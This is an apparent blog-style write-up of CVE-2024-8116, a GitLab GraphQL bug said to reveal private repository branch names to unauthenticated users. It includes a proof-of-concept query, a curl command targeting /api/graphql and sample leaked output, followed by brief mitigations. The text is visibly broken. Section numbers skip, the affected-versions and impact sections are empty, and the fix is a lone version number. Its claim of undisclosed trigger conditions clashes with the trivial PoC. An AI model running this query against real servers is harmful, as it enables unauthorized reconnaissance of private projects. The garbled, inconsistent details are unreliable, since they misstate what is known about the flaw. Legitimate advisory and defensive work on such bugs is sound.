CVE-2024-8116 - Exploiting GitLab GraphQL to Leak Branch Names Without Authorization

A new security issue, CVE-2024-8116, was discovered in multiple versions of GitLab Community Edition (CE) and Enterprise Edition (EE). This vulnerability lets unauthorized users use a specially crafted GraphQL query to uncover branch names in private repositories—a serious information leak that may help with further attacks.

Let’s break down how this issue works, including a code example, and show how to mitigate it.

2. What is CVE-2024-8116?

CVE-2024-8116 is an information disclosure bug in GitLab’s GraphQL API.
A non-authorized user manages to extract private branch names by sending special queries to the server.

Why does this matter?
Branch names can contain hints about upcoming features, security work, internal processes, or even code that attackers can later try to access. Knowing even the branch names can help hackers plan more targeted attacks.

GitLab’s advisory lists the following affected versions

- GitLab CE/EE

How does it happen?

Normally, branch names for a private project are kept confidential and only authorized users can see them.
A specific GraphQL query, however, could bypass this restriction under certain (undisclosed) conditions. The details are technical, but in essence, the bug let unauthenticated users enumerate branches by abusing the API design.

Impact:

5. Proof of Concept (PoC)

Below is a simple code example of how an attacker could leverage the flaw.
> Note: _Never run exploits on systems you don’t own! This is for educational and defensive purposes._

The “branches” field is exposed

query getBranches($fullPath: ID!) {
  project(fullPath: $fullPath) {
    repository {
      branchNames
    }
  }
}

Here’s an example using curl (no authentication needed)

curl -X POST https://gitlab.example.com/api/graphql \
  -H "Content-Type: application/json" \
  --data '{"query":"query getBranches($fullPath: ID!) { project(fullPath: $fullPath) { repository { branchNames } } }","variables":{"fullPath":"private-group/private-repo"}}'

If the repository private-group/private-repo exists and your GitLab is vulnerable, you’ll get

{
  "data": {
    "project": {
      "repository": {
        "branchNames": [
          "feature/big-redesign",
          "security/fix-auth",
          "develop",
          "main"
        ]
      }
    }
  }
}

> Tip: Even though you’re not logged in, you see internal branch names.

6. Fixes & Mitigations

The fix:

17.6.2

You should update immediately if running an older version.

Workaround:

Restrict public and unauthenticated API access at the network or web server level.

- Regularly monitor API access logs for unexpected requests to /api/graphql.

7. References

- GitLab Security Release Blog
- GitLab CVE-2024-8116 advisory
- GitLab Issue Tracker
- Official Patch Notes

Final Thoughts

While this bug doesn’t give attackers access to your code, information leaks like branch names can be damaging, providing attackers with clues, targets, and future attack plans.
Update your GitLab installations today and keep a close eye on API activity. Remember: Security starts before access control fails—don’t give away clues.

Timeline

Published on: 12/16/2024 05:15:05 UTC